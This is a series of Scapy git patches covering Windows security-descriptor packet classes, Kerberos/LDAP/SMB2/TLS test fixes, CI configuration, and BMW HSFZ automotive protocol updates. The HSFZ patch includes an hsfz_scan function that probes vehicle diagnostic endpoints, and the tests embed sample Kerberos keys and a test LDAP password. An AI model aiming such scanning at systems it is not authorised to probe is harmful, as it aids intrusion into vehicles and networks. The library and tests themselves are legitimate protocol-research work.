0x0020: "CLAIM_SECURITY_ATTRIBUTE_MANDATORY", + }, + ), + LEIntField("ValueCount", 0), + FieldListField( + "ValueOffsets", [], LEIntField("", 0), count_from=lambda pkt: pkt.ValueCount + ), + _NTLMPayloadField( + "Data", + lambda pkt: 16 + pkt.ValueCount * 4, + [ + ConditionalField( + StrFieldUtf16("Name", b""), + lambda pkt: pkt.NameOffset, + ), + # TODO: Values + ], + offset_name="Offset", + ), + ] + + +# [MS-DTYP] sect 2.4.4.15 + + +class WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + [ + PacketField( + "AttributeData", + CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1(), + CLAIM_SECURITY_ATTRIBUTE_RELATIVE_V1, + ) + ] + + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_RESOURCE_ATTRIBUTE_ACE, AceType=0x12) + +# [MS-DTYP] sect 2.4.4.16 + + +class WINNT_SYSTEM_SCOPED_POLICY_ID_ACE(Packet): + fields_desc = WINNT_ACCESS_ALLOWED_ACE.fields_desc + +bind_layers(WINNT_ACE_HEADER, WINNT_SYSTEM_SCOPED_POLICY_ID_ACE, AceType=0x13) # [MS-DTYP] sect 2.4.5 @@ -1212,28 +1521,28 @@ class SECURITY_DESCRIPTOR(_NTLMPayloadPacket): 0x00, -16, [ - "OwnerDefaulted", - "GroupDefaulted", - "DACLPresent", - "DACLDefaulted", - "SACLPresent", - "SACLDefaulted", - "DACLTrusted", - "ServerSecurity", - "DACLComputer", - "SACLComputer", - "DACLAutoInheriter", - "SACLAutoInherited", - "DACLProtected", - "SACLProtected", - "RMControlValid", - "SelfRelative", + "OWNER_DEFAULTED", + "GROUP_DEFAULTED", + "DACL_PRESENT", + "DACL_DEFAULTED", + "SACL_PRESENT", + "SACL_DEFAULTED", + "DACL_TRUSTED", + "SERVER_SECURITY", + "DACL_COMPUTED", + "SACL_COMPUTED", + "DACL_AUTO_INHERITED", + "SACL_AUTO_INHERITED", + "DACL_PROTECTED", + "SACL_PROTECTED", + "RM_CONTROL_VALID", + "SELF_RELATIVE", ], ), LEIntField("OwnerSidOffset", 0), LEIntField("GroupSidOffset", 0), - LEIntField("SaclOffset", 0), - LEIntField("DaclOffset", 0), + LEIntField("SACLOffset", 0), + LEIntField("DACLOffset", 0), _NTLMPayloadField( "Data", OFFSET, @@ -1247,12 +1556,12 @@ class SECURITY_DESCRIPTOR(_NTLMPayloadPacket): lambda pkt: pkt.GroupSidOffset, ), ConditionalField( - PacketField("Sacl", WINNT_ACL(), WINNT_ACL), - lambda pkt: pkt.Control.SACLPresent, + PacketField("SACL", WINNT_ACL(), WINNT_ACL), + lambda pkt: pkt.Control.SACL_PRESENT, ), ConditionalField( - PacketField("Dacl", WINNT_ACL(), WINNT_ACL), - lambda pkt: pkt.Control.DACLPresent, + PacketField("DACL", WINNT_ACL(), WINNT_ACL), + lambda pkt: pkt.Control.DACL_PRESENT, ), ], offset_name="Offset", diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index ab37998483d..c7b9325e9ea 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1294,7 +1294,7 @@ from scapy.layers.spnego import SPNEGOSSP client = SPNEGOSSP([ KerberosSSP( - UPN="User1@domain.local", + UPN="User1@DOMAIN.LOCAL", SPN="cifs/dc1", ST=KRB_Ticket(bytes.fromhex("618204a13082049da003020105a10e1b0c444f4d41494e2e4c4f43414ca2163014a003020103a10d300b1b04636966731b03646331a382046c30820468a003020112a10302010da282045a04820456671f6131b38ee6e682d62cb937b8b79c589753182f8dbcb14a91b031052a3c20f7b4c89bf9a41fe9960d112acc73f6bd6527dfe70700a3d3c2e72b4ba6705dfc040fd56f9d7cd60b580ebecec2bfb240baac619690dbd9301ed98cac037cfdff8ff96ac98358969f3532f9c6adc076d136a0ef96ebddef293df879bb42adfbf7670434f340ad673e0303ae186e1a510d7f50dbfee9ebab323c715d6b27a67ffec60dba9f7475e5dbf88eee1fcc95b7d467ab2b4ecef893a92a25c80b8480ac8c12bc10741523a2738a3d7c3d2c438235111188968486cab2934b32cad1b6b4b2cbf343b25d41ad463c0513cf21cf9f77f072f4a49d8042947064e3375a1ae76c355fd48d5fc163cf7f865af91bcb788cffe2e9e1a30a7e3f91be8fb55b0a8b8c0b600ef3e0e88feaad4fbf4fffe76c9302ee2acfa3b64ca28cd006fd4af9c27d2eb45e47e582b87e632aa23475caeb0e3e9d777339f5cb94abc19ebd080ffc78181bf81ff227182de422937675546633bd6ab688258a94d132fb590f8152d3f19bd55a1f336fb7c382140987ac2389134d8033882f923d3d5324a3e9f5437bd70f095e6bb00ee68d8f21912b19b27924c61b4e3bfe68411f9f220de8dace00e767b662313706730d4dc8539b309fc75e6ca4cae470cdf12cc3cfb191486e3e5eb8c80723b2b0473b07e4ea4d385487dd303df2db8d31f8c90d53c4adcf39ad78cf6c85fbb87b4c4ee531a42c2133df2b0362132374df995420e4b2a6d1e19d7879d518652d5101a316962b27b3884cb67d07572f96b9668ca42cca7311a7152ac7c6d492009192fa4a707989e43b2a10f19e535e7cf8afdaf63ce9a2a85ce1bd17d81cfe76d2ce5759a7fdbeff6fb279b8620bc2c5183b24be831c7ee157114f2700da210b36edb7bda7d91a32f7940bef431c76571cd44499f779cc4ebe829fb34eeaa1e442240d5962bdbcbc16c962974b546e9cee380dda49f651acc5c58acae4ad06d57e4b91d8c5557365e8ddda7ee9550963d70d4f56b44fc5a26e29b36cb21d11221825b5a2217cb1f1454d34d94a855cb860f2fe43681e3d302e7e124273dd18b04fddf660b8858e1e78d022cc03f467f3cf1a6e5df53bb831794542b1d08e38d3bfb0bf2e5ba6f75a0f77d56bf2924b144fff3c87ec7a57bff345ee8a4496676d38c9453c38e64521db2de6d6452aa8f3da1675134e8d90cbb0d274ce6189563fd9a56e56a800661e787b083950623035ddeeb2fb84f6fb2507f2c157e74e81a81970e11475ce926e393a55b06b77c444dbd23688e8a77c7f30337874fef787a187fcafd73a5a4837c8e3e60712308597ff72ea2edae69c9402ad7ae81abb3e9100f0c87b99b2564246bd56af8e6d0ecf2928e5151218f7e627c565e15540666f4f7c0e937c2d0e84782fcb1b535e596f6c4e0aed7c1d350e169d045f2eaaa4bb2f94cd149576f835e5eecb4418677d0444e51fafcbed2afac50b1d320bc223d2623601aee6df6a363a24294bfb3b00f2668dfc404e9fa17fe936e6620756a6918f7de2de343f380fab83fde911124be508")), KEY=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("4aad1c4c7b5bf02bfd061cfaebf0188d6c4f4642d569ca4ab536cb68adcb0e68")), @@ -1451,7 +1451,7 @@ except ValueError: = Create client and server KerberosSSP (raw) client = KerberosSSP( - UPN="User1@domain.local", + UPN="User1@DOMAIN.LOCAL", SPN="cifs/dc1", ST=KRB_Ticket(bytes.fromhex("618204a13082049da003020105a10e1b0c444f4d41494e2e4c4f43414ca2163014a003020103a10d300b1b04636966731b03646331a382046c30820468a003020112a10302010da282045a04820456671f6131b38ee6e682d62cb937b8b79c589753182f8dbcb14a91b031052a3c20f7b4c89bf9a41fe9960d112acc73f6bd6527dfe70700a3d3c2e72b4ba6705dfc040fd56f9d7cd60b580ebecec2bfb240baac619690dbd9301ed98cac037cfdff8ff96ac98358969f3532f9c6adc076d136a0ef96ebddef293df879bb42adfbf7670434f340ad673e0303ae186e1a510d7f50dbfee9ebab323c715d6b27a67ffec60dba9f7475e5dbf88eee1fcc95b7d467ab2b4ecef893a92a25c80b8480ac8c12bc10741523a2738a3d7c3d2c438235111188968486cab2934b32cad1b6b4b2cbf343b25d41ad463c0513cf21cf9f77f072f4a49d8042947064e3375a1ae76c355fd48d5fc163cf7f865af91bcb788cffe2e9e1a30a7e3f91be8fb55b0a8b8c0b600ef3e0e88feaad4fbf4fffe76c9302ee2acfa3b64ca28cd006fd4af9c27d2eb45e47e582b87e632aa23475caeb0e3e9d777339f5cb94abc19ebd080ffc78181bf81ff227182de422937675546633bd6ab688258a94d132fb590f8152d3f19bd55a1f336fb7c382140987ac2389134d8033882f923d3d5324a3e9f5437bd70f095e6bb00ee68d8f21912b19b27924c61b4e3bfe68411f9f220de8dace00e767b662313706730d4dc8539b309fc75e6ca4cae470cdf12cc3cfb191486e3e5eb8c80723b2b0473b07e4ea4d385487dd303df2db8d31f8c90d53c4adcf39ad78cf6c85fbb87b4c4ee531a42c2133df2b0362132374df995420e4b2a6d1e19d7879d518652d5101a316962b27b3884cb67d07572f96b9668ca42cca7311a7152ac7c6d492009192fa4a707989e43b2a10f19e535e7cf8afdaf63ce9a2a85ce1bd17d81cfe76d2ce5759a7fdbeff6fb279b8620bc2c5183b24be831c7ee157114f2700da210b36edb7bda7d91a32f7940bef431c76571cd44499f779cc4ebe829fb34eeaa1e442240d5962bdbcbc16c962974b546e9cee380dda49f651acc5c58acae4ad06d57e4b91d8c5557365e8ddda7ee9550963d70d4f56b44fc5a26e29b36cb21d11221825b5a2217cb1f1454d34d94a855cb860f2fe43681e3d302e7e124273dd18b04fddf660b8858e1e78d022cc03f467f3cf1a6e5df53bb831794542b1d08e38d3bfb0bf2e5ba6f75a0f77d56bf2924b144fff3c87ec7a57bff345ee8a4496676d38c9453c38e64521db2de6d6452aa8f3da1675134e8d90cbb0d274ce6189563fd9a56e56a800661e787b083950623035ddeeb2fb84f6fb2507f2c157e74e81a81970e11475ce926e393a55b06b77c444dbd23688e8a77c7f30337874fef787a187fcafd73a5a4837c8e3e60712308597ff72ea2edae69c9402ad7ae81abb3e9100f0c87b99b2564246bd56af8e6d0ecf2928e5151218f7e627c565e15540666f4f7c0e937c2d0e84782fcb1b535e596f6c4e0aed7c1d350e169d045f2eaaa4bb2f94cd149576f835e5eecb4418677d0444e51fafcbed2afac50b1d320bc223d2623601aee6df6a363a24294bfb3b00f2668dfc404e9fa17fe936e6620756a6918f7de2de343f380fab83fde911124be508")), KEY=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=bytes.fromhex("4aad1c4c7b5bf02bfd061cfaebf0188d6c4f4642d569ca4ab536cb68adcb0e68")), diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts index 91e5f5a7ade..86e452e94ce 100644 --- a/test/scapy/layers/ldap.uts +++ b/test/scapy/layers/ldap.uts @@ -104,7 +104,7 @@ assert raw(pkt2) == pkt.original = Basic CLDAP dissection & build test pkt = Ether(b'RT\x00\xbc\xe0=RT\x00y\xb1F\x08\x00E\x00\x00\xa5\x01\x1a\x00\x00\x80\x11\xc3H\xc0\xa8z\x91\xc0\xa8z\x03\xf1!\x01\x85\x00\x91o&0\x84\x00\x00\x00\x83\x02\x01\x01c\x84\x00\x00\x00z\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0\x84\x00\x00\x00S\xa3\x84\x00\x00\x00"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\xa3\x84\x00\x00\x00\x12\x04\x04Host\x04\nWINDOWS7-3\xa3\x84\x00\x00\x00\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\x84\x00\x00\x00\n\x04\x08Netlogon') -assert pkt.protocolOp.filter.filter.getfieldval("and_")[2].filter.attributeType == b"NtVer" +assert pkt.protocolOp.filter.filter.vals[2].filter.attributeType == b"NtVer" assert pkt.protocolOp.attributes[0].type == b"Netlogon" assert raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0G\xa3"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\xa3\x12\x04\x04Host\x04\nWINDOWS7-3\xa3\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\n\x04\x08Netlogon' @@ -215,4 +215,3 @@ pkt = NETLOGON(b'\x13\x00\\\x00\\\x00D\x00C\x001\x00\x00\x00\x00\x00D\x00O\x00M\ assert pkt.NtVersion == 1 assert pkt.UnicodeLogonServer == r"\\DC1" assert pkt.UnicodeDomainName == "DOMAIN" - diff --git a/test/scapy/layers/ldapopenldap.uts b/test/scapy/layers/ldapopenldap.uts new file mode 100644 index 00000000000..aabc2363841 --- /dev/null +++ b/test/scapy/layers/ldapopenldap.uts @@ -0,0 +1,32 @@ +% Tests that need a local instance of OpenLDAP to run + ++ Functional test against OpenLDAP +~ linux ci_only + += (OpenLDAP) connect to server, bind + +cli = LDAP_Client() +cli.connect("127.0.0.1") +cli.bind(LDAP_BIND_MECHS.SIMPLE, simple_username="cn=admin,dc=scapy,dc=net", simple_password="Bonjour1") +cli.close() + += (OpenLDAP) connect to server, bind, search + +cli = LDAP_Client() +cli.connect("127.0.0.1") +cli.bind(LDAP_BIND_MECHS.SIMPLE, simple_username="cn=admin,dc=scapy,dc=net", simple_password="Bonjour1") +res = cli.search("dc=scapy,dc=net", "(&(givenName=Another)(sn=Test))", scope=2) +cli.close() + +assert res == { + 'uid=another,ou=People,dc=scapy,dc=net': { + 'objectClass': ['top', + 'person', + 'inetOrgPerson'], + 'cn': ['Another Test'], + 'uid': ['another'], + 'sn': ['Test'], + 'givenName': ['Another'], + 'userPassword': ['testing'] + } +} diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index f15db4edd6f..7bd4969e206 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -532,7 +532,7 @@ sd = SECURITY_DESCRIPTOR(qr.Output) assert sd.OwnerSid.summary() == 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464' assert sd.GroupSid.summary() == 'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464' -assert sd.Dacl.toSDDL() == [ +assert sd.DACL.toSDDL() == [ '(A;OI+CI;;;;S-1-15-2-1)', '(A;OI+CI+IO;;;;S-1-3-0)', '(A;OI+CI;;;;S-1-1-0)', diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index 7b1ba524a87..dedaba5def0 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -465,7 +465,7 @@ def run_tls_native_test_server(post_handshake_auth=False, def ssl_server(): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - server.settimeout(10) + server.settimeout(1) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind(("0.0.0.0", 59000)) server.listen(5) @@ -486,6 +486,10 @@ def run_tls_native_test_server(post_handshake_auth=False, assert resp == bytes(REQS[1]) ssl_client_socket.send(bytes(RESPS[1])) # close socket + try: + ssl_client_socket.shutdown(socket.SHUT_RDWR) + finally: + ssl_client_socket.close() try: server.shutdown(socket.SHUT_RDWR) finally: @@ -522,7 +526,9 @@ def test_tls_client_native(post_handshake_auth=False, a.send(REQS[1]) pkt = a.sr1(REQS[1], timeout=1, verbose=0) assert pkt.load == b"Welcome" - # Wait + # Close + a.close() + # Wait for server to close server.join(3) assert not server.is_alive() From 41b6f2c0814b6b7c96c68179c9dcf8a4fb34b761 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 29 Sep 2024 00:48:49 +0300 Subject: [PATCH 1372/1632] ci: skip OpenLDAP tests on Packit (#4540) until I figure out whether it's possible to set up slapd there by analogy with what the scapy action on GitHub does. It's a follow-up to https://github.com/secdev/scapy/pull/4539. --- .packit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index 18efdebec6f..55dcc0a94a3 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^# check$/a%check\\nOPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K scanner' .packit_rpm/scapy.spec" + - "sed -i '/^# check$/a%check\\nOPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" From 1f9061d36ba34cfedd2ac25d153eb99c84279de7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 30 Sep 2024 12:24:35 +0200 Subject: [PATCH 1373/1632] Relicense files in doc/tls/notebook/raw_data (#4542) --- doc/notebooks/tls/raw_data/README.md | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 doc/notebooks/tls/raw_data/README.md diff --git a/doc/notebooks/tls/raw_data/README.md b/doc/notebooks/tls/raw_data/README.md new file mode 100644 index 00000000000..b089aaa045b --- /dev/null +++ b/doc/notebooks/tls/raw_data/README.md @@ -0,0 +1,3 @@ +This folder is used in the notebook and in some tests. + +Files in this folder are therefore cross licensed under both GPLv2 and CC-BY-NC-SA 2.5. From 79974f22ee82aa622d22dbe5ff6ab4e3f004880f Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Tue, 1 Oct 2024 11:06:54 +0300 Subject: [PATCH 1374/1632] tests: filter out non-ICMP packets in the tun test (#4543) When systemd-resolved with its LLMNR/mDNS responders enabled is run it starts sending its probes as soon as the tun interface pops up: ``` 00:36:36.643708 IP c > igmp.mcast.net: igmp v3 report, 2 group record(s) 00:36:36.644530 IP c.mdns > mdns.mcast.net.mdns: 0 [1n] ANY (QM)? c.local. (44) 00:36:36.645307 IP c.llmnr > 224.0.0.252.llmnr: UDP, length 22 ``` and that interferes with the test. Since the test is interested in ICMP packets only it can safely skip everything else. Fixes: ``` #(006)=[failed] Send ping packets from Linux into Scapy ... assert len(icmp4_sequences) == 3 AssertionError ``` --- test/tuntap.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/tuntap.uts b/test/tuntap.uts index d052276cf30..6017818fa52 100644 --- a/test/tuntap.uts +++ b/test/tuntap.uts @@ -96,7 +96,7 @@ conf.route6.resync() def cb(): send(IP(dst="192.0.2.2")/ICMP(seq=(1,3))) -t = AsyncSniffer(opened_socket=tun0, lfilter=lambda x: IP in x, started_callback=cb, count=3) +t = AsyncSniffer(opened_socket=tun0, lfilter=lambda x: ICMP in x, started_callback=cb, count=3) t.start() t.join(timeout=3) From 87b6e26210565e267eb6bca68829aca715d2e123 Mon Sep 17 00:00:00 2001 From: "David H. Gutteridge" Date: Wed, 2 Oct 2024 06:14:38 -0400 Subject: [PATCH 1375/1632] Handle release tag formats in _parse_tag() (#4548) * Handle release tag formats in _parse_tag() Also accommodate formal release tags, so the generated version is correct for downstream packagers. * Also handle release candidate format in _parse_tag() --- scapy/__init__.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/__init__.py b/scapy/__init__.py index 5854c05fd74..3eb172ec490 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -37,7 +37,12 @@ def _parse_tag(tag): # remove the 'v' prefix and add a '.devN' suffix return '%s.dev%s' % (match.group(1), match.group(2)) else: - raise ValueError('tag has invalid format') + match = re.match('^v?([\\d\\.]+(rc\\d+)?)$', tag) + if match: + # tagged release version + return '%s' % (match.group(1)) + else: + raise ValueError('tag has invalid format') def _version_from_git_archive(): From c38a5de175be8e59742be473f4fb2dd6edef5503 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 2 Oct 2024 14:26:59 +0200 Subject: [PATCH 1376/1632] Update HSFZ with more details (#4544) --- scapy/contrib/automotive/bmw/hsfz.py | 73 +++++++++++++++++++--------- test/contrib/automotive/bmw/hsfz.uts | 52 ++++++++++++-------- 2 files changed, 82 insertions(+), 43 deletions(-) diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 0d8724e24bf..3ac60a5ed01 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -6,18 +6,9 @@ # scapy.contrib.description = HSFZ - BMW High-Speed-Fahrzeug-Zugang # scapy.contrib.status = loads import logging -import struct import socket +import struct import time - -from scapy.contrib.automotive import log_automotive -from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.fields import IntField, ShortEnumField, XByteField -from scapy.layers.inet import TCP -from scapy.supersocket import StreamSocket -from scapy.contrib.automotive.uds import UDS, UDS_TP -from scapy.data import MTU - from typing import ( Any, Optional, @@ -28,6 +19,14 @@ Union, ) +from scapy.contrib.automotive import log_automotive +from scapy.contrib.automotive.uds import UDS, UDS_TP +from scapy.data import MTU +from scapy.fields import (IntField, ShortEnumField, XByteField, + ConditionalField, StrFixedLenField) +from scapy.layers.inet import TCP, UDP +from scapy.packet import Packet, bind_layers, bind_bottom_up +from scapy.supersocket import StreamSocket """ BMW HSFZ (High-Speed-Fahrzeug-Zugang / High-Speed-Car-Access). @@ -35,22 +34,43 @@ The physical interface for this connection is called ENET. """ + # #########################HSFZ################################### class HSFZ(Packet): + control_words = { + 0x01: "diagnostic_req_res", + 0x02: "acknowledge_transfer", + 0x10: "terminal15", + 0x11: "vehicle_ident_data", + 0x12: "alive_check", + 0x13: "status_data_inquiry", + 0x40: "incorrect_tester_address", + 0x41: "incorrect_control_word", + 0x42: "incorrect_format", + 0x43: "incorrect_dest_address", + 0x44: "message_too_large", + 0x45: "diag_app_not_ready", + 0xFF: "out_of_memory" + } name = 'HSFZ' fields_desc = [ IntField('length', None), - ShortEnumField('type', 1, {0x01: "message", - 0x02: "echo"}), - XByteField('src', 0), - XByteField('dst', 0), + ShortEnumField('control', 1, control_words), + ConditionalField( + XByteField('source', 0), lambda p: p.control == 1), + ConditionalField( + XByteField('target', 0), lambda p: p.control == 1), + ConditionalField( + StrFixedLenField("identification_string", + None, None, lambda p: p.length), + lambda p: p.control == 0x11) ] def hashret(self): # type: () -> bytes - hdr_hash = struct.pack("B", self.src ^ self.dst) + hdr_hash = struct.pack("B", self.source ^ self.target) pay_hash = self.payload.hashret() return hdr_hash + pay_hash @@ -71,6 +91,11 @@ def post_build(self, pkt, pay): bind_bottom_up(TCP, HSFZ, sport=6801) bind_bottom_up(TCP, HSFZ, dport=6801) bind_layers(TCP, HSFZ, sport=6801, dport=6801) + +bind_bottom_up(UDP, HSFZ, sport=6811) +bind_bottom_up(UDP, HSFZ, dport=6811) +bind_layers(UDP, HSFZ, sport=6811, dport=6811) + bind_layers(HSFZ, UDS) @@ -111,11 +136,11 @@ def recv(self, x=MTU, **kwargs): class UDS_HSFZSocket(HSFZSocket): - def __init__(self, src, dst, ip='127.0.0.1', port=6801, basecls=UDS): + def __init__(self, source, target, ip='127.0.0.1', port=6801, basecls=UDS): # type: (int, int, str, int, Type[Packet]) -> None super(UDS_HSFZSocket, self).__init__(ip, port) - self.src = src - self.dst = dst + self.source = source + self.target = target self.basecls = HSFZ self.outputcls = basecls @@ -128,7 +153,7 @@ def send(self, x): try: return super(UDS_HSFZSocket, self).send( - HSFZ(src=self.src, dst=self.dst) / x) + HSFZ(source=self.source, target=self.target) / x) except Exception as e: # Workaround: # This catch block is currently necessary to detect errors @@ -153,7 +178,7 @@ def recv(self, x=MTU, **kwargs): def hsfz_scan(ip, # type: str scan_range=range(0x100), # type: Iterable[int] - src=0xf4, # type: int + source=0xf4, # type: int timeout=0.1, # type: Union[int, float] verbose=True # type: bool ): @@ -166,7 +191,7 @@ def hsfz_scan(ip, # type: str :param ip: IPv4 address of target to scan :param scan_range: Range for HSFZ destination address - :param src: HSFZ source address, used during the scan + :param source: HSFZ source address, used during the scan :param timeout: Timeout for each request :param verbose: Show information during scan, if True :return: A list of open UDS_HSFZSockets @@ -175,7 +200,7 @@ def hsfz_scan(ip, # type: str log_automotive.setLevel(logging.DEBUG) results = list() for i in scan_range: - with UDS_HSFZSocket(src, i, ip) as sock: + with UDS_HSFZSocket(source, i, ip) as sock: try: resp = sock.sr1(UDS() / UDS_TP(), timeout=timeout, @@ -184,8 +209,8 @@ def hsfz_scan(ip, # type: str results.append((i, resp)) if resp: log_automotive.debug( - "Found endpoint %s, src=0x%x, dst=0x%x" % (ip, src, i)) + "Found endpoint %s, source=0x%x, target=0x%x" % (ip, source, i)) except Exception as e: log_automotive.exception( "Error %s at destination address 0x%x" % (e, i)) - return [UDS_HSFZSocket(0xf4, dst, ip) for dst, _ in results] + return [UDS_HSFZSocket(0xf4, target, ip) for target, _ in results] diff --git a/test/contrib/automotive/bmw/hsfz.uts b/test/contrib/automotive/bmw/hsfz.uts index aad8aa6c14a..6b0608dbc03 100644 --- a/test/contrib/automotive/bmw/hsfz.uts +++ b/test/contrib/automotive/bmw/hsfz.uts @@ -13,36 +13,36 @@ load_contrib("automotive.bmw.hsfz", globals_dict=globals()) = Basic Test 1 -pkt = HSFZ(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33') +pkt = HSFZ(control=1, source=0xf4, target=0x10)/Raw(b'\x11\x22\x33') assert bytes(pkt) == b'\x00\x00\x00\x05\x00\x01\xf4\x10\x11"3' = Basic Test 2 -pkt = HSFZ(type=1, src=0xf4, dst=0x10)/Raw(b'\x11\x22\x33\x11\x11\x11\x11\x11') +pkt = HSFZ(control=1, source=0xf4, target=0x10)/Raw(b'\x11\x22\x33\x11\x11\x11\x11\x11') assert bytes(pkt) == b'\x00\x00\x00\x0a\x00\x01\xf4\x10\x11"3\x11\x11\x11\x11\x11' = Basic Dissect Test pkt = HSFZ(b'\x00\x00\x00\x0a\x00\x01\xf4\x10\x11"3\x11\x11\x11\x11\x11') assert pkt.length == 10 -assert pkt.src == 0xf4 -assert pkt.dst == 0x10 -assert pkt.type == 1 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 +assert pkt.control == 1 assert pkt[1].service == 17 assert pkt[2].resetType == 34 = Build Test -pkt = HSFZ(src=0xf4, dst=0x10)/Raw(b"0" * 20) +pkt = HSFZ(source=0xf4, target=0x10)/Raw(b"0" * 20) assert bytes(pkt) == b'\x00\x00\x00\x16\x00\x01\xf4\x10' + b"0" * 20 = Dissect Test pkt = HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20) assert pkt.length == 24 -assert pkt.src == 0xf4 -assert pkt.dst == 0x10 -assert pkt.type == 1 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 +assert pkt.control == 1 assert pkt.securitySeed == b"0" * 20 assert len(pkt[1]) == pkt.length - 2 @@ -50,9 +50,9 @@ assert len(pkt[1]) == pkt.length - 2 pkt = HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 20 + b"p" * 100) assert pkt.length == 24 -assert pkt.src == 0xf4 -assert pkt.dst == 0x10 -assert pkt.type == 1 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 +assert pkt.control == 1 assert pkt.securitySeed == b"0" * 20 assert pkt.load == b'p' * 100 @@ -60,26 +60,40 @@ assert pkt.load == b'p' * 100 pkt = HSFZ(b'\x00\x00\x00\x18\x00\x01\xf4\x10\x67\x01' + b"0" * 19) assert pkt.length == 24 -assert pkt.src == 0xf4 -assert pkt.dst == 0x10 -assert pkt.type == 1 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 +assert pkt.control == 1 assert pkt.securitySeed == b"0" * 19 + = Dissect Test very long packet pkt = HSFZ(b'\x00\x0f\xff\x04\x00\x01\xf4\x10\x67\x01' + b"0" * 0xfff00) assert pkt.length == 0xfff04 -assert pkt.src == 0xf4 -assert pkt.dst == 0x10 -assert pkt.type == 1 +assert pkt.source == 0xf4 +assert pkt.target == 0x10 +assert pkt.control == 1 assert pkt.securitySeed == b"0" * 0xfff00 + += Dissect identification + +pkt = HSFZ(bytes.fromhex("000000320011444941474144523130424d574d4143374346436343463837393343424d5756494e5742413558373333333246483735373334")) +assert pkt.length == 50 +assert pkt.control == 0x11 +assert b"BMW" in pkt.identification_string + +pkt = UDP(bytes.fromhex("1a9be2d90040d67d000000320011444941474144523130424d574d4143374346436343463837393343424d5756494e5742413558373333333246483735373334")) +assert pkt.length == 50 +assert pkt.control == 0x11 +assert b"BMW" in pkt.identification_string + = Test HSFZSocket server_up = threading.Event() def server(): - buffer = bytes(HSFZ(type=1, src=0xf4, dst=0x10) / Raw(b'\x11\x22\x33' * 1024)) + buffer = bytes(HSFZ(control=1, source=0xf4, target=0x10) / Raw(b'\x11\x22\x33' * 1024)) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) From 2ae46b79c9dcba46fa8eb5bbee22f2535f287030 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 6 Oct 2024 12:24:21 +0200 Subject: [PATCH 1377/1632] Fix the race condition (#4558) --- scapy/main.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/main.py b/scapy/main.py index d84c6e3f8c4..89af5906635 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -73,7 +73,7 @@ def _probe_xdg_folder(var, default, *cf): # https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html # "If, when attempting to write a file, the destination directory is # non-existent an attempt should be made to create it with permission 0700." - path.mkdir(mode=0o700) + path.mkdir(mode=0o700, exist_ok=True) return path.joinpath(*cf).resolve() From 93c94722da7ac3c8a5e02d164bfd9237172e0f6e Mon 